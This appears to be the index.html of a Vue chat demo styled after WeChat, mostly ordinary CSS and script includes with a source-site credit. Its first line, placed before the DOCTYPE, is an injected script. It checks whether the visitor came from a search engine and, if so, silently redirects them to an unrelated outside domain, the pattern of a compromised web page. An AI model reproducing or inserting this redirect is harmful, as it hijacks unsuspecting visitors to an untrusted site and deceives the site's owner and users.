d:\wwwroot\wuchunhua\liaotian_vue\index.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
002: <html xmlns="http://www.w3.org/1999/xhtml">
003: <head>
004: <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
005:     <title>vue聊天h5模仿微信界面</title>
006:     <style>
007:         *, *:before, *:after {
008:             box-sizing: border-box;
009:         }
010:         body, html {
011:             height: 100%;
012:             overflow: hidden;
013:         }
014:         body, ul {
015:             margin: 0;
016:             padding: 0;
017:         }
018:         body {
019:             color: #4d4d4d;
020:             font: 14px/1.4em 'Helvetica Neue', Helvetica, 'Microsoft Yahei', Arial, sans-serif;
021:             background: #f5f5f5 url('dist/images/bg.jpg') no-repeat center;
022:             background-size: cover;
023:             font-smoothing: antialiased;
024:         }
025:         ul {
026:             list-style: none;
027:         }
028:         #chat {
029:             margin: 20px auto;
030:             width: 800px;
031:            height: 600px;
032:         }
033:     </style>
034: </head>
035: <body>
036:
037: <div id="chat"></div>
038: <script src="dist/vue.js"></script>
039: <script src="dist/main.js"></script>
040: <div style="text-align:center;">
041: <p>来源:<a href="http://www.mycodes.net/" target="_blank">源码之家</a></p>
042: </div>
043:
044: </body>
045: </html>
046:
047:
048: